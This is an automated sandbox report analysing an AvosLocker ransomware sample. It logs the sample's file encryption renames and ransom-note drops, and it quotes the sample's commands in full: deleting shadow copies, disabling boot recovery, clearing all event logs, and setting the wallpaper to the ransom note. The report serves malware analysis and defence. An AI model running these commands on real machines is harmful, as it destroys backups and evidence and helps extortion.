Malware Analysis Report

2024-10-16 03:28

Sample ID 230316-k56l3sab26
Target Roseland.bin
SHA256 bff12a83b1fc2e0ad0000ad9b68abc8eada559bb1094caaf5b9f52887df23705
Tags
avoslocker evasion ransomware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

bff12a83b1fc2e0ad0000ad9b68abc8eada559bb1094caaf5b9f52887df23705

Threat Level: Known bad

The file Roseland.bin was found to be: Known bad.

Malicious Activity Summary

avoslocker evasion ransomware

Avoslocker Ransomware

Modifies boot configuration data using bcdedit

Deletes shadow copies

Modifies extensions of user files

Enumerates connected drives

Drops desktop.ini file(s)

Sets desktop wallpaper using registry

Drops file in Program Files directory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Interacts with shadow copies

Suspicious use of WriteProcessMemory

Uses Volume Shadow Copy service COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-03-16 09:12

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-03-16 09:12

Reported

2023-03-16 09:14

Platform

win7-20230220-en

Max time kernel

60s

Max time network

36s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Roseland.exe"

Signatures

Avoslocker Ransomware

ransomware avoslocker

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Modifies extensions of user files

ransomware
Description Indicator Process Target
File opened for modification C:\Users\Admin\Pictures\HideGroup.tiff C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\HideGroup.tiff => C:\Users\Admin\Pictures\HideGroup.tiff.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\PublishGrant.tif => C:\Users\Admin\Pictures\PublishGrant.tif.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\ResumeUnregister.tif => C:\Users\Admin\Pictures\ResumeUnregister.tif.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\SubmitUnpublish.raw => C:\Users\Admin\Pictures\SubmitUnpublish.raw.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\UnblockClose.raw => C:\Users\Admin\Pictures\UnblockClose.raw.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\UnregisterOpen.raw => C:\Users\Admin\Pictures\UnregisterOpen.raw.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1209476241.png" C:\Windows\system32\reg.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Microsoft Games\Multiplayer\Spades\de-DE\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-core-execution.xml_hidden C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Zaporozhye C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ipssrb.xml C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bNext-down.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0281638.WMF C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\WATER\WATER.ELM C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18233_.WMF C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Office 2.xml C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\buttonDown_Off.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_few-showers.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGREPFRM.DPV C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\ACCWIZ\UTILITY.ACCDA C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\de-DE\js\settings.js C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Oasis\TAB_OFF.GIF C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02398U.BMP C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\de-DE\settings.html C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-ui.xml C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\en-US\js\currency.js C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\MARQUEE.POC C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00910_.WMF C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\System\msadc\ja-JP\msdaprsr.dll.mui C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\ja-JP\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\es\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Novokuznetsk C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGMARQ.XML C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\OUTLOOK_F_COL.HXK C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0297551.WMF C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\CST6CDT C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\cursors.properties C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-util-enumerations.jar C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder_5.5.0.165303.jar C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Purble Place\de-DE\PurblePlace.exe.mui C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.net.nl_zh_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_left_pressed.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_right_pressed.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\2.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00194_.WMF C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_few-showers.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Thatch.thmx C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS00186_.WMF C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\24.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0315447.JPG C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0188513.WMF C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\QRCode.pmp C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\logo.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Windows Media Player\Media Renderer\DMR_48.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.XML C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_HighMask.bmp C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\720_480shadow.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\VSTA\8.0\x86\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Windows Mail\ja-JP\msoeres.dll.mui C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-profiling.xml C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Denver C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\slideShow.html C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_Premium.gif C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\MessageAttachmentIconImagesMask.bmp C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\appletrailers.luac C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\.lastModified C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Windows Mail\ja-JP\msoeres.dll.mui C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1728 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 1300 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 1300 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 1300 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 1300 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 1412 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 1412 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 1412 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 1412 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 748 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 748 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 748 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 748 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1684 wrote to memory of 1740 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1684 wrote to memory of 1740 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1684 wrote to memory of 1740 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1300 wrote to memory of 2112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1300 wrote to memory of 2112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1300 wrote to memory of 2112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 748 wrote to memory of 2716 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 2716 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 2716 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2044 wrote to memory of 2424 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2044 wrote to memory of 2424 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2044 wrote to memory of 2424 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1412 wrote to memory of 2460 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1412 wrote to memory of 2460 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1412 wrote to memory of 2460 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1728 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1728 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1728 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1728 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2900 wrote to memory of 3392 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2900 wrote to memory of 3392 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2900 wrote to memory of 3392 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2900 wrote to memory of 3512 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe
PID 2900 wrote to memory of 3512 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe
PID 2900 wrote to memory of 3512 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\Roseland.exe

"C:\Users\Admin\AppData\Local\Temp\Roseland.exe"

C:\Windows\system32\cmd.exe

cmd /c wmic shadowcopy delete /nointeractive

C:\Windows\system32\cmd.exe

cmd /c vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

cmd /c bcdedit /set {default} recoveryenabled No

C:\Windows\system32\cmd.exe

cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\cmd.exe

cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete /nointeractive

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\1209476241.png /f

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False

Network

N/A

Files

C:\Users\GET_YOUR_FILES_BACK.txt

MD5 6d81ed40ba0a283e5483bfe6a448e9d7
SHA1 0c847a5f9df743b13e1aa11b4c24a4309e9a7119
SHA256 b4464f61655ca584170694bedd52c6cff2b74c18a761b33cfb1387f017d2d57d
SHA512 8956415f155f24852ac672aa06cc6a8819a2a0e44a9b940f8f3390c34ebb43ff10f4635722f104a5a9a94098d3f286362f507dc49d3f048e540f48c073eaf379

memory/2716-687-0x00000000024B0000-0x0000000002530000-memory.dmp

memory/2716-700-0x000000001B230000-0x000000001B512000-memory.dmp

memory/2716-740-0x00000000023E0000-0x00000000023E8000-memory.dmp

memory/2716-1422-0x00000000024B0000-0x0000000002530000-memory.dmp

